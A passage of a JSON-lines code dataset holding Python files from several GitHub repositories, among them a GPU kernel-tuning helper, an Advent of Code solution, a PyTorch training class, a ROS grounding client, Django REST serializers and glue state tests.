KernelGridder.cu\n source_lines = add_file(filename_kernel)\n\n # Return the result as a string\n return \"\".join(source_lines)\n\n\ndef get_supported_mem_clocks(dev, n=0):\n mem_clocks = pynvml.nvmlDeviceGetSupportedMemoryClocks(dev)\n\n if n and len(mem_clocks) > n:\n mem_clocks = mem_clocks[::int(len(mem_clocks)/n)]\n\n return mem_clocks\n\n\ndef get_supported_gr_clocks(dev, mem_clock, n=0):\n assert mem_clock in get_supported_mem_clocks(dev)\n gr_clocks = pynvml.nvmlDeviceGetSupportedGraphicsClocks(\n dev, mem_clock\n )\n\n if n and (len(gr_clocks) > n):\n gr_clocks = gr_clocks[::int(len(gr_clocks)/n)]\n\n return gr_clocks\n\n\ndef setup_pwr_limit_tuning(dev, tune_params, n=None):\n print(\"> Setup power limit tuning\")\n (\n power_limit_min,\n power_limit_max,\n ) = pynvml.nvmlDeviceGetPowerManagementLimitConstraints(dev)\n power_limit_min *= 1e-3 # Convert to Watt\n power_limit_max *= 1e-3 # Convert to Watt\n power_limit_round = 5\n if n == None:\n n = int((power_limit_max - power_limit_min) / power_limit_round)\n tune_params[\"nvml_pwr_limit\"] = power_limit_round * np.round( # Rounded power limit values\n (np.linspace(power_limit_min, power_limit_max, n) / power_limit_round)\n )\n print(f\"Tuning nvml_pwr_limit = {tune_params['nvml_pwr_limit']}\")\n\n\ndef report_most_efficient(results, tune_params, metrics):\n best_config = min(results, key=lambda x: x[\"nvml_energy\"])\n print(\"most efficient configuration:\")\n kernel_tuner.util.print_config_output(\n tune_params, best_config, quiet=False, metrics=metrics, units=None)\n\n\ndef run_tuning(\n kernel_name,\n kernel_source,\n problem_size,\n kernel_arguments,\n tune_params,\n metrics,\n iterations,\n args\n):\n tune_power_limit = args.tune_power_limit\n power_limit_steps = int(\n args.power_limit_steps) if args.power_limit_steps else None\n tune_gr_clock = args.tune_gr_clock\n gr_clock_steps = int(\n args.gr_clock_steps) if args.gr_clock_steps else None\n tune_mem_clock = args.tune_mem_clock\n mem_clock_steps = int(\n args.mem_clock_steps) if args.mem_clock_steps else None\n\n nvmlobserver = NVMLObserver(\n [\n \"nvml_power\",\n \"nvml_energy\",\n \"core_freq\",\n \"mem_freq\",\n \"temperature\",\n ]\n )\n dev = nvmlobserver.nvml.dev\n\n def tune_kernel():\n results, env = kernel_tuner.tune_kernel(\n kernel_name=kernel_name,\n kernel_source=kernel_source,\n problem_size=problem_size,\n grid_div_x=[],\n arguments=kernel_arguments,\n tune_params=tune_params,\n verbose=False,\n metrics=metrics,\n observers=[nvmlobserver],\n iterations=iterations,\n compiler_options=[\"-use_fast_math\"],\n block_size_names=[\"BLOCK_SIZE_X\"]\n )\n return results\n\n if tune_power_limit:\n setup_pwr_limit_tuning(dev, tune_params, power_limit_steps)\n\n if tune_mem_clock:\n # When tuning for both the memory clocks as well as for the graphics clock,\n # we need to run the tuner once for every memory clock, such that only the\n # valid combinations of the two will be tested.\n mem_clocks = get_supported_mem_clocks(dev, mem_clock_steps)\n\n results = []\n for mem_clock in mem_clocks:\n tune_params['nvml_mem_clock'] = [mem_clock]\n\n # Setup valid graphics clocks for the current memory clock\n gr_clocks = get_supported_gr_clocks(dev, mem_clock, gr_clock_steps)\n if not tune_gr_clock:\n gr_clocks = [max(gr_clocks)]\n tune_params['nvml_gr_clock'] = gr_clocks\n\n # Start tuning\n results_ = tune_kernel()\n\n report_most_efficient(results_, tune_params, metrics)\n results += results_\n\n else:\n # When not tuning for memory clock, we use the maximum supported 
memory\n # clock and select the corresponding supported graphics clocks.\n if tune_gr_clock:\n mem_clocks = get_supported_mem_clocks(dev)\n mem_clock = max(mem_clocks)\n gr_clocks = get_supported_gr_clocks(dev, mem_clock, gr_clock_steps)\n tune_params['nvml_gr_clock'] = gr_clocks\n\n # Start tuning\n results = tune_kernel()\n\n report_most_efficient(results, tune_params, metrics)\n\n return results\n","repo_name":"kernsuite-debian/idg","sub_path":"idg-bin/tuning/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":7439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18630626668","text":"import numpy as np\n\ndef create_grid(filename):\n map_dict = {}\n dimensions = (0,0)\n temp_array = [] # create dictionary to return\n data =np.delete((np.loadtxt(filename, dtype=str, delimiter= \" \")),1 ,1) # strip extra characters from input\n for i in data:\n first = i[0].split(\",\")\n second = i[1].split(\",\")\n temp_array.append([(int(first[0]), int(first[1])), (int(second[0]), int(second[1]))])\n for i in temp_array:\n for j in i:\n if j[0] > dimensions[0]:\n dimensions = (j[0], dimensions[1])\n elif j[1] > dimensions[1]:\n dimensions = (dimensions[0], j[1])\n grid = np.zeros((dimensions[0]+1, dimensions[1]+1))\n data = np.array(temp_array)\n map_dict[\"map\"] = grid\n map_dict[\"data\"] = data\n return map_dict\n\ndef edit_map(dictionary):\n counter = 0\n counter_array = []\n for i,j in dictionary[\"data\"]:\n if i[0] == j[0] or i[1] == j[1]:\n counter_array.append(counter)\n counter += 1\n else:\n counter += 1\n for i in counter_array:\n first_tuple = (dictionary[\"data\"][i][0])\n second_tuple = (dictionary[\"data\"][i][1]) \n if first_tuple[0] == second_tuple[0]:\n top = max(int(first_tuple[1]), int(second_tuple[1]))\n bottom = min(int(first_tuple[1]), int(second_tuple[1]))\n for x in range(bottom, top+1):\n dictionary[\"map\"][x, int(first_tuple[0])] += 1\n elif first_tuple[1] == second_tuple[1]:\n top = max(int(first_tuple[0]), int(second_tuple[0]))\n bottom = min(int(first_tuple[0]), int(second_tuple[0]))\n for z in range(bottom, top+1):\n dictionary[\"map\"][int(first_tuple[1]), z] += 1\n \n return ((dictionary[\"map\"] > 1).sum())\n \ndef diagonal_map(dictionary):\n for coords in dictionary[\"data\"]:\n x_result = coords[0][0] == coords[1][0]\n y_result = coords[0][1] == coords [1][1]\n if x_result:\n bottom = min(coords[0][1], coords[1][1]) \n top = max(coords[0][1], coords[1][1])\n for i in range(bottom, top+1):\n dictionary[\"map\"][coords[0][0], i] += 1\n elif y_result:\n bottom = min(coords[0][0], coords[1][0])\n top = max(coords[0][0], coords[1][0])\n for i in range(bottom, top+1):\n dictionary[\"map\"][i, coords[0][1]] += 1\n else:\n if coords[0][0] < coords[1][0]:\n start = coords[0]\n end = coords[1]\n duration = end[0] - start[0]\n if start[1] < end[1]:\n for i in range(0, duration+1):\n dictionary[\"map\"][(start[0])+i, (start[1])+i] += 1\n else:\n for i in range(0, duration+1):\n dictionary[\"map\"][(start[0])+i, (start[1])-i] += 1\n else:\n start = coords[1]\n end = coords[0]\n duration = end[0] - start[0]\n if start[1] < end[1]:\n for i in range(0, duration+1):\n dictionary[\"map\"][(start[0])+i, (start[1])+i] += 1\n else:\n for i in range(0, duration+1):\n dictionary[\"map\"][(start[0])+i, (start[1])-i] += 1\n \n\n\n\n return ((dictionary[\"map\"] > 1).sum())\n\nif __name__ == \"__main__\":\n print(edit_map(create_grid(\"05.txt\")))\n 
print(diagonal_map(create_grid(\"05.txt\")))\n\n","repo_name":"zalazalaza/AOC2021","sub_path":"05/05.py","file_name":"05.py","file_ext":"py","file_size_in_byte":3522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"40634541525","text":"\"\"\"class to create models with Pytorch statistical model.\"\"\"\n\nimport logging\nfrom pathlib import Path\nfrom typing import Tuple\n\nimport torch\nfrom torch import Tensor, nn\n\nfrom ..dataset.swan_data_base import SwanDataBase\nfrom ..type_hints import PathLike\nfrom ..utils.early_stopping import EarlyStopping\nfrom .base_modeller import BaseModeller\nimport numpy as np\nimport sklearn\n\n# Starting logger\nLOGGER = logging.getLogger(__name__)\n\n\nclass TorchModeller(BaseModeller[torch.Tensor]):\n \"\"\"Object to create statistical models.\"\"\"\n def __init__(self,\n network: nn.Module,\n data: SwanDataBase,\n replace_state: bool = False,\n use_cuda: bool = False):\n \"\"\"Base class of the modeller\n\n Parameters\n ----------\n network\n Torch Neural Network [description]\n dataset\n Torch Dataset\n replace_state\n Remove previous state file\n use_cuda\n Train the model using Cuda\n \"\"\"\n super().__init__(data, replace_state)\n torch.set_default_dtype(torch.float32)\n # Early stopping functionality\n self.early_stopping = EarlyStopping()\n\n # cuda support\n self.use_cuda = use_cuda\n if self.use_cuda:\n self.device = torch.device(\"cuda\")\n else:\n self.device = torch.device(\"cpu\")\n\n # create the network\n self.network = network.to(self.device)\n\n # set the default optimizer\n self.set_optimizer('SGD', lr=0.001)\n\n # set the default loss\n self.set_loss('MSELoss')\n\n # set scheduler\n self.set_scheduler('StepLR', 0.1)\n\n # I/O options\n self.workdir = Path('.')\n self.path_scales = self.workdir / \"swan_scales.pkl\"\n\n # current number of epoch\n self.epoch = 0\n\n # Loss data\n self.train_losses = []\n self.validation_losses = []\n\n def set_optimizer(self, name: str, *args, **kwargs) -> None:\n \"\"\"Set an optimizer using the config file\n\n Parameters\n ----------\n name\n optimizer name\n\n \"\"\"\n self.optimizer = torch.optim.__getattribute__(name)(\n self.network.parameters(), *args, **kwargs)\n\n def set_loss(self, name: str, *args, **kwargs) -> None:\n \"\"\"Set the loss function for the training.\n\n Parameters\n ----------\n name\n Loss function name\n\n \"\"\"\n self.loss_func = getattr(nn, name)(*args, **kwargs)\n\n def set_scheduler(self, name, *args, **kwargs) -> None:\n \"\"\"Set the sceduler used for decreasing the LR\n\n Parameters\n ----------\n name\n Scheduler name\n\n \"\"\"\n if name is None:\n self.scheduler = None\n else:\n self.scheduler = getattr(torch.optim.lr_scheduler,\n name)(self.optimizer, *args, **kwargs)\n\n def split_data(self, frac: Tuple[float, float], batch_size: int):\n \"\"\"Split the data into a training and validation set.\n\n Parameters\n ----------\n frac\n fraction to divide the dataset, by default [0.8, 0.2]\n \"\"\"\n # create the dataloader\n indices_train, indices_validate = self.data.create_data_loader(frac=frac, batch_size=batch_size)\n self.labels_trainset = self.data.labels[indices_train]\n self.labels_validset = self.data.labels[indices_validate]\n self.store_trainset_in_state(np.concatenate((indices_train, indices_validate)), len(indices_validate), store_features=False)\n\n def train_model(self,\n nepoch: int,\n frac: Tuple[float, float] = (0.8, 0.2),\n batch_size: int = 64) -> Tuple[Tensor, Tensor]:\n \"\"\"Train 
the model\n\n Parameters\n ----------\n nepoch : int\n number of ecpoch to run\n frac : List[int], optional\n divide the dataset in train/valid, by default [0.8, 0.2]\n batch_size : int, optional\n batchsize, by default 64\n \"\"\"\n LOGGER.info(\"TRAINING STEP\")\n self.split_data(frac, batch_size)\n\n # run over the epochs\n for epoch in range(self.epoch, self.epoch + nepoch):\n LOGGER.info(f\"epoch: {epoch}\")\n results = []\n expected = []\n\n # set the model to train mode\n # and init loss\n self.network.train()\n loss_all = 0.\n\n # iterate over the data loader\n for batch_data in self.data.train_loader:\n x_batch, y_batch = self.data.get_item(batch_data)\n x_batch = x_batch.to(self.device)\n y_batch = y_batch.to(self.device)\n loss_batch, predicted = self.train_batch(x_batch, y_batch)\n loss_all += loss_batch\n results.append(predicted)\n expected.append(y_batch)\n\n # Train loss\n loss = loss_all / len(self.data.train_dataset)\n self.train_losses.append(loss)\n LOGGER.info(f\"Loss: {loss}\")\n\n # decrease the LR if necessary\n if self.scheduler is not None:\n self.scheduler.step()\n\n # Check for early stopping\n self.validate_model()\n self.validation_losses.append(self.validation_loss)\n self.early_stopping(self.save_model, epoch, self.validation_loss)\n if self.early_stopping.early_stop:\n LOGGER.info(\"EARLY STOPPING\")\n break\n\n # Save the models\n self.save_model(epoch, loss_all)\n\n # Store the loss\n self.state.store_array(\"loss_train\", self.train_losses)\n self.state.store_array(\"loss_validate\", self.validation_losses)\n\n return tuple(self.inverse_transform(torch.cat(x)) for x in (results, expected))\n\n def train_batch(self, inp_data: Tensor, ground_truth: Tensor) -> Tuple[float, Tensor]:\n \"\"\"Train a single mini batch\n\n Parameters\n ----------\n inp_data : Tensor\n input data of the network\n ground_truth : Tensor\n ground trurth of the data points in input\n\n Returns\n -------\n float\n loss over the mini batch\n \"\"\"\n prediction = self.network(inp_data)\n loss = self.loss_func(prediction, ground_truth)\n loss.backward()\n self.optimizer.step()\n self.optimizer.zero_grad()\n\n return loss.item(), prediction\n\n def validate_model(self) -> Tuple[Tensor, Tensor]:\n \"\"\"compute the output of the model on the validation set\n\n Returns\n -------\n Tuple[Tensor, Tensor]\n output of the network, ground truth of the data\n \"\"\"\n results = []\n expected = []\n\n # Disable any gradient calculation\n with torch.no_grad():\n self.network.eval()\n loss_all = 0\n for batch_data in self.data.valid_loader:\n x_val, y_val = self.data.get_item(batch_data)\n x_val = x_val.to(self.device)\n y_val = y_val.to(self.device)\n predicted = self.network(x_val)\n loss = self.loss_func(predicted, y_val)\n loss_all += loss.item()\n results.append(predicted)\n expected.append(y_val)\n self.validation_loss = loss_all / len(self.data.valid_dataset)\n LOGGER.info(f\"validation loss: {self.validation_loss}\")\n\n return tuple(self.inverse_transform(torch.cat(x)) for x in (results, expected))\n\n def predict(self, inp_data: Tensor) -> Tensor:\n \"\"\"compute output of the model for a given input\n\n Parameters\n ----------\n inp_data\n input data of the network\n\n Returns\n -------\n Tensor\n output of the network\n \"\"\"\n with torch.no_grad():\n self.network.eval() # Set model to evaluation mode\n predicted = self.network(inp_data)\n return predicted\n\n def save_model(self,\n epoch: int,\n loss: float,\n filename: str = 'swan_chk.pt') -> None:\n \"\"\"Save the modle current 
status.\"\"\"\n path = self.workdir / filename\n torch.save(\n {\n 'epoch': epoch,\n 'model_state_dict': self.network.state_dict(),\n 'optimizer_state_dict': self.optimizer.state_dict(),\n 'loss': loss\n }, path)\n\n def load_model(self, filename: PathLike) -> None:\n \"\"\"Load the model from the state file.\"\"\"\n checkpoint = torch.load(filename)\n self.network.load_state_dict(checkpoint['model_state_dict'])\n self.optimizer.load_state_dict(checkpoint['optimizer_state_dict'])\n self.epoch = checkpoint['epoch']\n self.loss = checkpoint['loss']\n\n def inverse_transform(self, arr: Tensor) -> np.ndarray:\n \"\"\"Unscale ``arr`` using the fitted scaler.\"\"\"\n def _detach(arr: Tensor) -> np.ndarray:\n arr = arr.detach().numpy()\n if len(arr.shape) == 1:\n arr = arr.reshape(-1, 1)\n\n return arr\n\n try:\n return self.data.transformer.inverse_transform(_detach(arr))\n except sklearn.exceptions.NotFittedError:\n return _detach(arr)\n","repo_name":"nlesc-nano/swan","sub_path":"swan/modeller/torch_modeller.py","file_name":"torch_modeller.py","file_ext":"py","file_size_in_byte":9445,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"54"} +{"seq_id":"42145904571","text":"#!/usr/bin/env python\n\nimport rospy\nfrom sensor_msgs.msg import Image\nimport cv2\nfrom cv_bridge import CvBridge, CvBridgeError\nimport xml.etree.ElementTree as ET\nimport actionlib\nimport ingress_msgs.msg\nimport copy\nimport numpy as np\nimport os\n\n\ndef get_bboxes_from_xml(xml_path):\n xml_tree = ET.parse(xml_path)\n root = xml_tree.getroot()\n\n bboxes = []\n for obj in root.findall('object'):\n bbox_tmp = obj.find('bndbox')\n bboxes.append(float(bbox_tmp.find('xmin').text))\n bboxes.append(float(bbox_tmp.find('ymin').text))\n bboxes.append(float(bbox_tmp.find('xmax').text) - float(bbox_tmp.find('xmin').text))\n bboxes.append(float(bbox_tmp.find('ymax').text) - float(bbox_tmp.find('ymin').text))\n\n rospy.loginfo(\"bboxes found: {}\".format(bboxes))\n return bboxes\n\n\ndef ground_img_with_bbox(load_client, img, bboxes):\n\n # load image, extract and store feature vectors for each bounding box\n img_msg = CvBridge().cv2_to_imgmsg(img, \"rgb8\")\n goal = ingress_msgs.msg.DenseRefexpLoadBBoxesGoal()\n goal.input = img_msg\n goal.boxes = bboxes\n load_client.send_goal(goal)\n load_client.wait_for_result()\n load_result = load_client.get_result()\n\n rospy.loginfo(\"ground_img_with_bbox, result received\")\n rospy.loginfo(\"captions: {}\".format(load_result.captions))\n rospy.loginfo(\"scores: {}\".format(load_result.scores))\n\n # ------------------------------------------------\n # visualization\n draw_img = img.copy()\n for idx in range(0, len(bboxes), 4):\n x1 = int(bboxes[idx])\n y1 = int(bboxes[idx + 1])\n x2 = int(x1 + bboxes[idx + 2])\n y2 = int(y1 + bboxes[idx + 3])\n\n cv2.rectangle(draw_img, (x1, y1), (x2, y2), (0, 0, 255), 5)\n\n # add captions\n font = cv2.FONT_HERSHEY_DUPLEX\n # print(\"x1 {}, y1 {}\".format(x1, y1))\n if y1 - 15 > 5:\n cv2.putText(draw_img, load_result.captions[int(idx // 4)],\n (x1 + 6, y1 - 15), font, 1, (255, 255, 255), 2)\n else:\n cv2.putText(draw_img, load_result.captions[int(idx // 4)],\n (x1 + 6, y1 + 5), font, 1, (255, 255, 255), 2)\n\n cv2.imwrite('./grounding_result.png', draw_img)\n\n\nif __name__ == '__main__':\n try:\n rospy.init_node('Grounding', anonymous=True)\n\n # wait for action servers to show up\n # if you are stuck here, that means the servers are not ready\n # or your network connection is broken\n load_client = 
actionlib.SimpleActionClient(\n 'dense_refexp_load_bboxes', ingress_msgs.msg.DenseRefexpLoadBBoxesAction)\n rospy.loginfo(\"1. Waiting for dense_refexp_load_bboxes action server ...\")\n load_client.wait_for_server()\n\n query_client = actionlib.SimpleActionClient(\n 'dense_refexp_query', ingress_msgs.msg.DenseRefexpQueryAction)\n rospy.loginfo(\"2. Waiting for dense_refexp_query action server ...\")\n query_client.wait_for_server()\n\n rospy.loginfo(\"Ingress server found! Ready.\")\n\n while not rospy.is_shutdown():\n try:\n # get image\n img_path = raw_input(\"Enter path to image: \")\n img_path = \"images/\" + img_path\n img = cv2.imread(img_path, cv2.IMREAD_COLOR)\n\n xml_path = os.path.splitext(img_path)[0] + '.xml'\n bboxes = get_bboxes_from_xml(xml_path)\n except Exception as e:\n rospy.logerr(e)\n\n ground_img_with_bbox(load_client, img, bboxes)\n\n except rospy.ROSInterruptException:\n pass\n","repo_name":"AdaCompNUS/ingress-proj","sub_path":"examples/grounding_img_with_bboxes.py","file_name":"grounding_img_with_bboxes.py","file_ext":"py","file_size_in_byte":3600,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"43391156622","text":"from drf_yasg.utils import swagger_serializer_method\nfrom rest_framework import serializers\nfrom rest_framework.exceptions import ValidationError\n\nfrom polls.models import Poll, Participant, Choice\nfrom polls.utils import get_user_data\n\n\nclass ChoiceIdsSerializer(serializers.Serializer):\n choices_id = serializers.ListField(child=serializers.UUIDField(), allow_empty=False)\n\n def validate_choices_id(self, choices_id):\n \"\"\"\n Prepares valid choices for a Poll.\n Returns QuerySet of existing choices in a Poll.\n \"\"\"\n\n valid_choices = self.context['poll'].choices.filter(id__in=choices_id)\n return valid_choices\n\n def validate(self, attrs):\n multi_selection = self.context['poll'].multi_selection\n if attrs['choices_id'].count() > 1 and not multi_selection:\n raise ValidationError({'choices_id': 'multiple choices are not available'})\n\n return attrs\n\n def save(self, user_data):\n \"\"\"\n Saves vote for each choice.\n \"\"\"\n\n participant, _ = Participant.objects.get_or_create(\n ip=user_data['ip'], defaults={'user_agent': user_data['user_agent']}\n )\n\n for choice in self.validated_data['choices_id']:\n choice.participants.add(participant)\n\n\nclass ChoiceSerializer(serializers.ModelSerializer):\n votes = serializers.SerializerMethodField()\n\n @swagger_serializer_method(serializer_or_field=serializers.IntegerField)\n def get_votes(self, obj):\n \"\"\"Counts votes for each choice.\"\"\"\n return obj.participants.count()\n\n class Meta:\n model = Choice\n fields = ('choice', 'votes', 'id')\n\n\nclass PollSerializer(serializers.ModelSerializer):\n choices = ChoiceSerializer(many=True)\n link = serializers.SerializerMethodField(read_only=True)\n\n def get_link(self, obj):\n return self.context['request'].build_absolute_uri(obj.url)\n\n class Meta:\n model = Poll\n fields = ('id', 'title', 'choices', 'link', 'created_at', 'multi_selection')\n\n\nclass PollCreateSerializer(serializers.ModelSerializer):\n choices = serializers.ListField(allow_empty=False)\n\n class Meta:\n model = Poll\n fields = ('title', 'choices', 'multi_selection')\n\n def create(self, validated_data):\n \"\"\"Performs create the poll.\"\"\"\n\n user_data = get_user_data(self.context['request'])\n creator, _ = Participant.objects.get_or_create(\n ip=user_data['ip'], defaults={'user_agent': 
user_data['user_agent']}\n )\n poll = Poll.objects.create(\n creator=creator,\n title=validated_data['title'],\n multi_selection=validated_data['multi_selection'],\n )\n\n Choice.objects.bulk_create(\n [Choice(choice=choice, poll=poll) for choice in validated_data['choices']]\n )\n\n return poll\n","repo_name":"gixproject/polls","sub_path":"polls/api/v1/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"27344308693","text":"# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n\nclass Solution:\n def reverseList(self, head: [ListNode]) -> [ListNode]:\n\n # iterative\n if not head:\n return head\n tail = head\n while head.next:\n next_tail = head.next\n head.next = next_tail.next\n next_tail.next = tail\n tail = next_tail\n return tail\n\n # recursion, not my code\n # if not head or not head.next:\n # return head\n # p = self.reverseList(head.next)\n # head.next.next = head\n # head.next = None\n # return p\n\n\n_head = ListNode(1, ListNode(2, ListNode(3, ListNode(4, ListNode(5)))))\n\nprint(Solution().reverseList(_head))\n","repo_name":"Sadomtsevvs/Leetcode","sub_path":"206. Reverse Linked List.py","file_name":"206. Reverse Linked List.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"4980063021","text":"import json\nimport threading\nfrom typing import Dict, Any\n\nDATA_FILE = \"data.json\"\n\nclass UnsafeOperation(Exception):\n pass\nclass Data:\n def __init__(self, data_file: str):\n self.data_file: str = data_file\n self.data: Dict[str, Any] = None\n self.lock = threading.Lock()\n \n def require_lock(self):\n if not self.lock.locked():\n raise UnsafeOperation\n\n def read(self):\n self.require_lock()\n try:\n with open(self.data_file) as data_file:\n self.data = json.load(data_file)\n except:\n print(f\"Failed to load {self.data_file}\")\n self.data = {}\n\n def write(self):\n self.require_lock()\n with open(self.data_file, \"w\") as data_file:\n json.dump(self.data, data_file)\n\n def get(self):\n self.require_lock()\n if self.data is None:\n self.read()\n return self.data\n\nDATA = Data(DATA_FILE)","repo_name":"mlutze/dough","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"34775877540","text":"import numpy as np\n\nfrom numpy.testing import assert_allclose\n\nfrom echo import CallbackProperty, ListCallbackProperty\nfrom glue.core import Data, DataCollection\n\nfrom .test_state import clone\nfrom ..state_objects import (State, StateAttributeLimitsHelper,\n StateAttributeSingleValueHelper,\n StateAttributeHistogramHelper)\n\n\nclass SimpleTestState(State):\n a = CallbackProperty()\n b = CallbackProperty()\n flat = ListCallbackProperty()\n nested = ListCallbackProperty()\n\n\ndef test_state_serialization():\n\n state1 = SimpleTestState()\n state1.a = 2\n state1.b = 'hello'\n state1.flat = [1, 3, 4]\n\n sub_state = SimpleTestState()\n sub_state.a = 3\n sub_state.b = 'blah'\n sub_state.flat = [1, 2]\n sub_state.nested = []\n\n state1.nested = [1, 3, sub_state]\n\n state2 = clone(state1)\n\n assert state2.a == 2\n assert state2.b == 'hello'\n assert state2.flat == [1, 3, 4]\n assert state2.nested[0:2] == [1, 3]\n assert 
state2.nested[2].a == 3\n assert state2.nested[2].b == 'blah'\n assert state2.nested[2].flat == [1, 2]\n assert state2.nested[2].nested == []\n\n\nEXPECTED_STR = \"\"\"\na: 2\nb: hello\nflat: \nnested: \n\"\"\"\n\nEXPECTED_REPR = \"\"\"\n\n nested: \n>\n\"\"\"\n\n\ndef test_state_str_repr():\n\n state1 = SimpleTestState()\n state1.a = 2\n state1.b = 'hello'\n state1.flat = [1, 3, 4]\n\n sub_state = SimpleTestState()\n\n state1.nested = [1, 3, sub_state]\n\n assert str(state1) == EXPECTED_STR.strip()\n assert repr(state1) == EXPECTED_REPR.strip()\n\n\nclass TestStateAttributeLimitsHelper():\n\n def setup_method(self, method):\n\n self.data = Data(x=np.linspace(-100, 100, 10000),\n y=np.linspace(2, 3, 10000), label='test_data')\n\n self.data_collection = DataCollection([self.data])\n\n class SimpleState(State):\n\n layer = CallbackProperty()\n comp = CallbackProperty()\n lower = CallbackProperty()\n upper = CallbackProperty()\n log = CallbackProperty(False)\n scale = CallbackProperty(100)\n\n self.state = SimpleState()\n\n self.helper = StateAttributeLimitsHelper(self.state, attribute='comp',\n lower='lower', upper='upper',\n percentile='scale', log='log')\n self.state.data = self.data\n self.state.comp = self.data.id['x']\n\n self.x_id = self.data.main_components[0]\n self.y_id = self.data.main_components[1]\n\n def test_minmax(self):\n assert self.helper.lower == -100\n assert self.helper.upper == +100\n\n def test_change_attribute(self):\n self.helper.attribute = self.y_id\n assert self.helper.lower == 2\n assert self.helper.upper == 3\n self.helper.attribute = self.x_id\n assert self.helper.lower == -100\n assert self.helper.upper == +100\n\n def test_change_percentile(self):\n\n # Changing scale mode updates the limits\n self.helper.percentile = 99.5\n assert_allclose(self.helper.lower, -99.5)\n assert_allclose(self.helper.upper, +99.5)\n self.helper.percentile = 99\n assert_allclose(self.helper.lower, -99)\n assert_allclose(self.helper.upper, +99)\n self.helper.percentile = 90\n assert_allclose(self.helper.lower, -90)\n assert_allclose(self.helper.upper, +90)\n\n # When switching to custom, the last limits are retained\n self.helper.percentile = \"Custom\"\n assert_allclose(self.helper.lower, -90)\n assert_allclose(self.helper.upper, +90)\n\n def test_percentile_cached(self):\n # Make sure that if we change scale and change attribute, the scale\n # modes are cached on a per-attribute basis.\n self.helper.percentile = 99.5\n self.state.comp = self.y_id\n assert self.helper.percentile == 100\n self.helper.percentile = 99\n self.state.comp = self.x_id\n assert self.helper.percentile == 99.5\n self.state.comp = self.y_id\n assert self.helper.percentile == 99\n\n def test_flip_button(self):\n\n self.helper.flip_limits()\n\n assert self.helper.lower == +100\n assert self.helper.upper == -100\n\n # Make sure that values were re-cached when flipping\n self.state.comp = self.y_id\n assert self.helper.lower == 2\n assert self.helper.upper == 3\n self.state.comp = self.x_id\n assert self.helper.lower == +100\n assert self.helper.upper == -100\n\n def test_manual_edit(self):\n\n # Make sure that values are re-cached when edited manually\n self.helper.percentile = \"Custom\"\n self.state.lower = -122\n self.state.upper = 234\n self.helper.log = True\n assert self.helper.lower == -122\n assert self.helper.upper == 234\n assert self.helper.log\n self.state.comp = self.y_id\n assert self.helper.lower == 2\n assert self.helper.upper == 3\n assert not self.helper.log\n self.state.comp = self.x_id\n 
assert self.helper.lower == -122\n assert self.helper.upper == 234\n assert self.helper.log\n\n\nclass TestStateAttributeSingleValueHelper():\n\n def setup_method(self, method):\n\n self.data = Data(x=np.linspace(-100, 30, 9999),\n y=np.linspace(2, 3, 9999), label='test_data')\n\n self.data_collection = DataCollection([self.data])\n\n class SimpleState(State):\n\n layer = CallbackProperty()\n comp = CallbackProperty()\n val = CallbackProperty()\n\n self.state = SimpleState()\n\n self.helper = StateAttributeSingleValueHelper(self.state, attribute='comp',\n function=np.nanmedian, value='val')\n\n self.state.data = self.data\n\n self.state.comp = self.data.id['x']\n\n self.x_id = self.data.main_components[0]\n self.y_id = self.data.main_components[1]\n\n def test_value(self):\n assert self.helper.value == -35.\n\n def test_change_attribute(self):\n self.helper.attribute = self.y_id\n assert self.helper.value == 2.5\n self.helper.attribute = self.x_id\n assert self.helper.value == -35\n\n def test_manual_edit(self):\n self.state.val = 42.\n assert self.helper.value == 42\n self.state.comp = self.y_id\n assert self.helper.value == 2.5\n self.state.comp = self.x_id\n assert self.helper.value == 42\n\n\nclass TestStateAttributeHistogramHelper():\n\n def setup_method(self, method):\n\n self.data = Data(x=[-3.2, 4.3, 2.2, 5.4, 7.2, -1.1, 2.3],\n y=['a', 'f', 'd', 'e', 'f', 'f', 'a'], label='test_data')\n\n self.data_collection = DataCollection([self.data])\n\n class SimpleState(State):\n\n layer = CallbackProperty()\n comp = CallbackProperty()\n x_min = CallbackProperty()\n x_max = CallbackProperty()\n n_bin = CallbackProperty()\n\n self.state = SimpleState()\n\n self.helper = StateAttributeHistogramHelper(self.state, attribute='comp',\n lower='x_min', upper='x_max', n_bin='n_bin')\n\n self.state.data = self.data\n\n def test_default_numerical(self):\n self.state.comp = self.data.id['x']\n assert self.state.x_min == -3.2\n assert self.state.x_max == 7.2\n assert self.state.n_bin == 15\n\n def test_default_categorical(self):\n self.state.comp = self.data.id['y']\n assert self.state.x_min == -0.5\n assert self.state.x_max == 3.5\n assert self.state.n_bin == 4\n\n def test_hitting_limits(self):\n\n # FIXME: here we modify the internal defaults rather than making a new\n # state helper, but this could be improved\n self.helper._default_n_bin = 4\n self.helper._max_n_bin = 3\n\n self.state.comp = self.data.id['x']\n assert self.state.x_min == -3.2\n assert self.state.x_max == 7.2\n assert self.state.n_bin == 4\n\n self.state.comp = self.data.id['y']\n assert self.state.x_min == -0.5\n assert self.state.x_max == 3.5\n assert self.state.n_bin == 3\n\n def test_caching(self):\n self.state.comp = self.data.id['x']\n self.state.x_min = 2\n self.state.x_max = 7\n self.state.n_bin = 8\n self.state.comp = self.data.id['y']\n self.state.x_min = 1.5\n self.state.x_max = 3.5\n self.state.n_bin = 3\n self.state.comp = self.data.id['x']\n assert self.state.x_min == 2\n assert self.state.x_max == 7\n assert self.state.n_bin == 8\n self.state.comp = self.data.id['y']\n assert self.state.x_min == 1.5\n assert self.state.x_max == 3.5\n assert self.state.n_bin == 3\n\n\ndef test_histogram_helper_common_n_bin():\n\n data = Data(x=[-3.2, 4.3, 2.2],\n y=['a', 'f', 'd'],\n 